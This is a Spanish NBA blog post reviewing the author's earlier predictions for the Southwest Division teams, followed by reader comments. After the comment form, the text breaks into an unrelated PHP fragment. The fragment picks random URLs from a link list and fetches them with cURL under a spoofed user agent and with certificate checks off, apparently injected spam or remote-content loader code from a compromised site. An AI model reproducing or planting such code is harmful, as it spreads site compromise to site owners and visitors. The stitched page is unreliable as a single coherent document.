Revisando los pronósticos 2012: Southwest

21 de March de 2012 por TheDeerHunter

SAN ANTONIO SPURS

Pronóstico Enero 2012: 6-8 del Oeste y eliminados en primera ronda de Playoffs (análisis).
Probabilidad de acierto: La primera ronda no será fácil, pero 6-8 del Oeste no va a ser.
Calificación pronóstico: D

Nos dejamos llevar por el sentimiento de decepción evidente que supuso la eliminación ante Grizzlies del año pasado. El final de ciclo al que hacíamos referencia va a llegar más pronto que tarde. Es ley de vida. No todos los años se puede encontrar en el draft un jugador de la talla de Tim Duncan, menos aún con las rondas que han manejado los Spurs desde que él llegó hace ya 14 temporadas.

Es complicado apostar en contra de un equipo así. Uno de los huesos más duros del comienzo de siglo junto a los Celtics. ¿Quién nos iba a decir con este calendario tan exigente que estos Spurs se mostrarían incluso frescos y brillantes en ataque? ¿Quién diría en su día que el equipo espartano que hizo campeón Popovic florecería en una escuadra de más de 100 puntos anotados en los últimos coletazos del proyecto?  Y cuidado, porque Manudo puede llegar fresco a postemporada…

El caso es que la campaña que vienen firmando es prácticamente inmejorable. No cabe duda de que siempre pueden caer en el primer cruce, pero por lo mostrado hasta la fecha no es probable. El resultado de un trabajo bien hecho: Blair, Splitter, Neal, Green, Leonard… Despojos de draft con los que construir un gran equipo.

MEMPHIS GRIZZLIES

Pronóstico Enero 2012: Primera ronda (análisis).
Probabilidad de acierto: Baja
Calificación pronóstico: D

Ni en mis delirios más optimistas podía creer que sin Randolph ni Arthur los Grizzlies podían estar a estas alturas del curso rozando el 60% de victorias en el Oeste y pujando por encaramarse a la parte alta del cuadro. ¿Cuáles son las claves de haber metido tanto la pata?

Para empezar tenía la impresión de que el equipo no es tan bueno defensivamente como vimos en los últimos playoffs. Pensaba que a Rudy Gay le iba a costar entrar en esa dinámica y que, cómo no, se iban a notar las bajas. Para nada. Encajan poco más de 93 puntos y no cabe duda de que esa cifra va a caer más en lo que queda. Hay que empezar a reconocerle cosas al Rudy Gay más sacrificado, o a Conley, a Speights (¿quién lo iba a decir?), por supuesto a Marc omnipresente, a Allen, a Dante Cunningham… aunque en estos últimos casos se da más por descontado.

Después Marc Gasol, que habría que echarle de comer a parte. Lo dijo Trecet en su día cuando pocos lo creían. Impresionante el punto de calidad y madurez que ha alcanzado el chaval. Yo desde luego no lo he llegado a ver venir. El modelo de liderato desde la generosidad, en un equipo que no hace nada poníamos como el paradigma del egoísmo. La ausencia de Randolph le ha hecho ganar todo el crédito que le faltaba pero su vuelta le viene como agua de mayo. Estamos ante el juego interior a batir de la conferencia o incluso de toda la liga.

Por último, en un inútil ejercicio de autojustificación, los rivales no han estado para tirar cohetes. En su día yo pensaba en Mavs, Clippers, Blazers, Nuggets, Lakers, Spurs… Si tuviéramos que pensarlo ahora hay muy pocos de su categoría.

A riesgo de volver a quedar en evidencia me vuelvo a mojar. Si en su día decía que repetir los resultados del año pasado era un gran éxito ahora digo que todo lo que no sea, como mínimo igualarlos será un fracaso. Se les ve capacitados para pelear la conferencia.

DALLAS MAVERICKS

Pronóstico Enero 2012: Primeros puestos del Oeste, en el top 4. Mínimo segunda ronda (análisis).
Probabilidad de acierto: Baja
Calificación pronóstico: C-

Parece que fue hace un siglo cuando los Mavericks deslumbraron al mundo con la adquisición de su primer anillo, y no es porque sea un siglo lo que suman los veteranos que han aterrizado al equipo.

Pasa más frecuentemente de lo que queremos pensar. Al campeón le cuesta encontrar las sensaciones y motivación que le encaramó al éxito. Más aún si no es posible mantener el nivel deportivo del equipo de forma natural. No se puede substituir así como así la batería de nombres que salieron en verano. Fundamentales casi todos, pero que en buena lógica querían rentabilizar su condición. No está el mundo como para perdonar oportunidades y, ni el dinero de Cuban ni la nueva normativa salarial ponían las bases para retenerles.

Hace años que venimos repitiendo aquello de “las últimas flechas de Robin Hood” y todo eso pero la realidad del proyecto es la que es y hay que aprovecharlo hasta el final con las cartas que van saliendo. Tenía cierta lógica la planificación deportiva pero algunas cosas salen bien (el paso delante de Mahinmi o Beaubois, el rendimiento de Delonte) y otras no tan bien (fundamentalmente Odom, aunque también podemos hablar del comprensible modo tran-tran de Vince, Marion, Terry o el propio Kidd). El equipo es el que hay, difícilmente mejorable.

Siempre se puede apelar a aquello de “Don’t ever underestimate the heart of a champion” y esto aplica mientras exista una remota posibilidad de que la líen en postemporada, pero lógicamente las sensaciones no son las mejores y la posición en la que previsiblemente afrontarán los cruces tampoco. Con todo no voy a ser yo quien los entierre, ni mucho menos quién les fustigue si no logran el repeat. Lo más normal del mundo y que les quiten lo bailado.

HOUSTON ROCKETS

Pronóstico Enero 2012: Ligeramente por debajo del 50% de victorias y fuera de Playoffs (análisis)
Probabilidad de acierto: Media
Calificación pronóstico: C

Fueron los mayores perjudicados del Sternato o “CP3gate”. Si a los Lakers se les quedaron con el culo al aire Gasol, que ha terminado cumpliendo, y Odom, al que malvendieron, y a los Hornets les importaba realmente un pimiento si la cosa iba o venía, Houston ha arrastrado la sensación de interinidad en sus más importantes figuras todo el curso, aunque lo ha compensado en parte la explosión de Lowry y el rendimiento del rookie Parsons.

El análisis hacía hincapié en la renuncia definitiva al proyecto Yao, de una forma positiva, pero entre el lockout y el “trade-interruptus” posterior el peso de los hechos borró cualquier recuerdo a esa cuestión como también a cualquier punto de vista optimista  para afrontar el futuro.

Sin embargo, al contrario de lo que pensábamos alguno, Kevin McHale ha logrado aprovechar algo de la herencia de su  predecesor, manteniendo bien el tipo e incluso llegando a desplegar picos de muy buen juego en medio de la irregularidad de Scola y Martin e incluso a pesar de la reciente lesión de su máxima estrella.

Llegado este punto y a pesar de la sensación de flecos sueltos significativos, la clasificación actual del equipo y el fichaje del siempre cumplidor Camby apuntan a mejorar antes que a empeorar y depende más de una última machada ajena que de ellos para que definitivamente erremos el tiro. Apostaría a que pisarán postemporada, pero el futuro de la era Post-Yao está muy lejos de estar claro.

NEW ORLEANS HORNETS

Pronóstico Enero 2012: Indiferente (lotería). (Análisis)
Probabilidad de acierto: Certeza absoluta entonces y ahora.
Calificación pronóstico: AAA+ (lo másss)

Qué decir de los Hornets. ¿Por dónde empiezo que no dijera ya en su día? El peor equipo de largo de la conferencia Oeste y segundo peor de toda la liga (y porque hay por ahí algún otro bastante mítico por malo) . El caso es que hasta me atrevería a decir que bastante están haciendo y si acaso habría que resaltar la dignidad y profesionalidad en muchos de su plantilla.

Para empezar, si el objetivo de la liga era solucionar este grave problema, hasta donde sabemos no se ha logrado. Se apresuraron a movilizarse a la hora de intervenir los movimientos de la filial pero a partir de ahí no parece molestar mucho tener un equipo zombie en la liga.

Lo veíamos venir. El impacto de Eric Gordon, la mayor perla obtenida por el caso CP3, el mejor jugador por eficiencia en la plantilla, ha sido de 2 partidos. Yo no apostaría mi sueldo a que serán muchos más. A Kaman, que por momento ponían en el escaparate, le hemos visto poco más de la mitad de los partidos y el hombre lo ha hecho bien. Okafor lleva perdidos unos cuantos, pero prisa tampoco hay para volver… Particularmente lo entiendo.

El mejor rendimiento deportivo cabalga a lomos de la profesionalidad de gente como Jack, Ariza, Landry, Belinelli, Vasquez y Ayón, pero también de las ganas de éstos de venderse y, con suerte, salir de un proyecto limitado “por ley divina”.

A mí lo único que me falta  por ver es que a alguien se le ocurra que no conviene que “el equipo de todos” (en el mal sentido) aspire al mejor jugador del draft. El veto al pick nº1 lo podríamos ver este mismo verano. Esperemos que eso sólo sea una paranoia absurda que me cruza por mi malpensante mente.

Comenta

4 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Recuerdo un día de facultad, de cañitas, papas bravas y mus de por medio, hace 5 años, que estábamos hablando de nba y yo solté una de las mías: Marc es mejor que Pau. Coño, el descojone padre, sabéis? Todo dios riéndose de mí, y creo que todavía recuerdan aquello. En fin, después de irse de Girona, y todo lo que le ha pasado hasta ahora, es evidente que individualmente no es mejor que Pau, pero ahora mismo es un top 5 de centers de la NBA, y nadie apostaría por ello en su momento. Un jugador muy válido. Es impresionante la progresión que ha tenido, y además todavía no se le ve que haya tocado techo. Puede mejorar defensivamente, y su tiro aún puede ir a más, así como su tiro libre. Memphis mola. Cuando lleguen los últimos días de mayo, seguramente hablemos bastante de ellos. Un hueso duro en cualquier cruce que les toque. Sería bastante gracioso, y a la vez, entretenido y morboso, ver una primera ronda Spurs-Grizzlies. Todas las eliminatorias del oeste prometen, y ahora mismo al más flojo que veo es a Clippers. A ver qué les puede dar Young, pero ya dije que no le veo como un jugador de equipo, ni tampoco capaz de mejorar al equipo desde la segunda línea. En definitiva, no le veo como un jugador para un equipo grande. Aunque la verdad, tampoco sé por qué nos estamos decepcionando con Clippers, cuando yo creo que desde el principio de temporada dijimos que había que ser cautos con ellos, que solo verles consolidados en playoffs era para estar satisfechos, y ahora que están teniendo un mes malo les estamos enterrando. Supongo que habrá pasado porque empezaron muy bien, y ahora se nos están cayendo un poco…

      Citar

  2. Sancho88 dice:
    #2

    Uff, y si se hiciese eso que comentas Deer, de vetarles en la lotería… ya me parecería un gran cachondeo. Qué se sabe de la compra del equipo? por fin van a ser un equipo autónomo? porque la actual situación es insotenible. Para estar así, es mejor que desaparezcan o se muden a Seattle, por ejemplo. Por cierto, qué se sabe de lo de Memphis y su traslado a San Diego? Solo son rumores o es algo factible?

      Citar

  3. Cocinitas dice:
    #3

    Por cierto tienes un error, no es la pacific division esta es la southwest.

      Citar

  4. TheDeerHunter dice:
    #4

    Cocinitas:
    Por cierto tienes un error, no es la pacific division esta es la southwest.

    gracias!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>